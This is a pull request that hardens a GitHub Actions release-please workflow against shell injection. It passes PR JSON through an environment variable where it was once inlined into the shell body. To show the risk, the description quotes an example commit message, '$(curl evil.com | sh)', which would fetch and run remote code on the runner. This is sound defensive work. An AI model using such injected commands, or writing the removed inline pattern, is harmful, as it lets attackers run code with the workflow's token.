### PR TITLE
fix(ci): pass release-please PR JSON via env to avoid shell injection

### DIFF
--- a/.github/workflows/release-please.yml
+++ b/.github/workflows/release-please.yml
@@ -40,47 +40,55 @@ jobs:
 
       - name: Check if major release
         id: check-major
+        # PR_JSON is passed via env (not inline ${{ }} substitution into the
+        # shell body) because the PR body contains user-supplied changelog
+        # text — apostrophes (e.g. "can't"), backticks, parens, and `$()` would
+        # otherwise either break the shell parser (current bug) or execute as
+        # commands (script-injection vector). See GHA security hardening:
+        # https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable
+        env:
+          PR_JSON: ${{ needs.release-please.outputs.pr }}
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
         run: |
           # Get current version from manifest
           CURRENT_VERSION=$(jq -r '.[]' .release-please-manifest.json | head -1)
-          CURRENT_MAJOR=$(echo $CURRENT_VERSION | cut -d. -f1)
+          CURRENT_MAJOR=$(echo "$CURRENT_VERSION" | cut -d. -f1)
 
-          # Get the PR number
-          PR_NUMBER=$(echo '${{ needs.release-please.outputs.pr }}' | jq -r '.number')
+          # Get the PR number — read from $PR_JSON, never inline the JSON
+          PR_NUMBER=$(jq -r '.number' <<<"$PR_JSON")
 
           # Get the proposed version from the PR title (format: "chore(main): release X.Y.Z")
-          PR_TITLE=$(gh pr view $PR_NUMBER --json title -q '.title')
+          PR_TITLE=$(gh pr view "$PR_NUMBER" --json title -q '.title')
           PROPOSED_VERSION=$(echo "$PR_TITLE" | grep -oP '\d+\.\d+\.\d+' || echo "")
 
           if [ -z "$PROPOSED_VERSION" ]; then
             echo "Could not determine proposed version from PR title: $PR_TITLE"
-            echo "is_major=true" >> $GITHUB_OUTPUT
+            echo "is_major=true" >> "$GITHUB_OUTPUT"
             exit 0
           fi
 
-          PROPOSED_MAJOR=$(echo $PROPOSED_VERSION | cut -d. -f1)
+          PROPOSED_MAJOR=$(echo "$PROPOSED_VERSION" | cut -d. -f1)
 
           echo "Current version: $CURRENT_VERSION (major: $CURRENT_MAJOR)"
           echo "Proposed version: $PROPOSED_VERSION (major: $PROPOSED_MAJOR)"
 
           if [ "$PROPOSED_MAJOR" -gt "$CURRENT_MAJOR" ]; then
             echo "This is a MAJOR release - requires manual merge"
-            echo "is_major=true" >> $GITHUB_OUTPUT
+            echo "is_major=true" >> "$GITHUB_OUTPUT"
           else
             echo "This is a minor/patch release - will auto-merge"
-            echo "is_major=false" >> $GITHUB_OUTPUT
+            echo "is_major=false" >> "$GITHUB_OUTPUT"
           fi
-        env:
-          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
 
       - name: Auto-merge release PR
         if: steps.check-major.outputs.is_major == 'false'
-        run: |
-          PR_NUMBER=$(echo '${{ needs.release-please.outputs.pr }}' | jq -r '.number')
-          echo "Auto-merging PR #$PR_NUMBER (minor/patch release)"
-          gh pr merge $PR_NUMBER --squash || echo "Auto-merge failed, PR may need manual merge"
         env:
+          PR_JSON: ${{ needs.release-please.outputs.pr }}
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          PR_NUMBER=$(jq -r '.number' <<<"$PR_JSON")
+          echo "Auto-merging PR #$PR_NUMBER (minor/patch release)"
+          gh pr merge "$PR_NUMBER" --squash || echo "Auto-merge failed, PR may need manual merge"
 
   # Build binaries for all platforms when a release is created
   build-release:


### PR DESCRIPTION
Fixes the failing **Release Please** workflow on \`main\`. Also closes a script-injection vector.

## The bug

\`auto-merge-release\` job templated the PR JSON directly into the shell body:

\`\`\`yaml
run: |
  PR_NUMBER=$(echo '${{ needs.release-please.outputs.pr }}' | jq -r '.number')
\`\`\`

The PR body contains user-controlled changelog text. Once a commit message included \`can't\` (apostrophe), the bash single-quoted string terminated mid-body and the parens from markdown links like \`(2026-05-06)\` and \`(https://github.com/...)\` got interpreted as subshell syntax:

\`\`\`
/home/runner/.../*.sh: line 6: syntax error near unexpected token `('
\`\`\`

The release-please-bot's PR for v0.1.18 included this commit:
> \`fix(supercompact): self-disable guard so disabled plugin **can't** fire stale hooks (#103)\`

The apostrophe in \"can't\" → broke the shell parser → workflow failed → PR #104 stuck unmerged.

## Worse: script injection

This pattern doesn't just break on apostrophes. Any contributor could land a commit message with \`\$(curl evil.com | sh)\` or backticks and have it execute on the runner with the workflow's GH_TOKEN. This is the standard GHA script-injection vector flagged in [GitHub's security hardening docs](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable).

## Fix

Pass \`\${{ needs.release-please.outputs.pr }}\` via \`env: PR_JSON: ...\` and read it with \`jq -r '.number' <<<\"\$PR_JSON\"\`. Env vars are passed as data, not interpolated into the script body, so shell metachars in the PR body can't influence parsing or execution.

Applied to both vulnerable steps:
- \`Check if major release\`
- \`Auto-merge release PR\`

Also tightened quoting around \`\$CURRENT_VERSION\`, \`\$PR_TITLE\`, \`\$GITHUB_OUTPUT\` expansions while I was in there.

## Test plan

- [x] YAML syntax: \`python3 -c \"import yaml; yaml.safe_load(...)\"\` clean
- [x] Manually reproduced the failure pattern with \`can't\` + parens — old approach errors, new approach extracts \`104\` cleanly
- [ ] CI confirmation when this lands and release-please reruns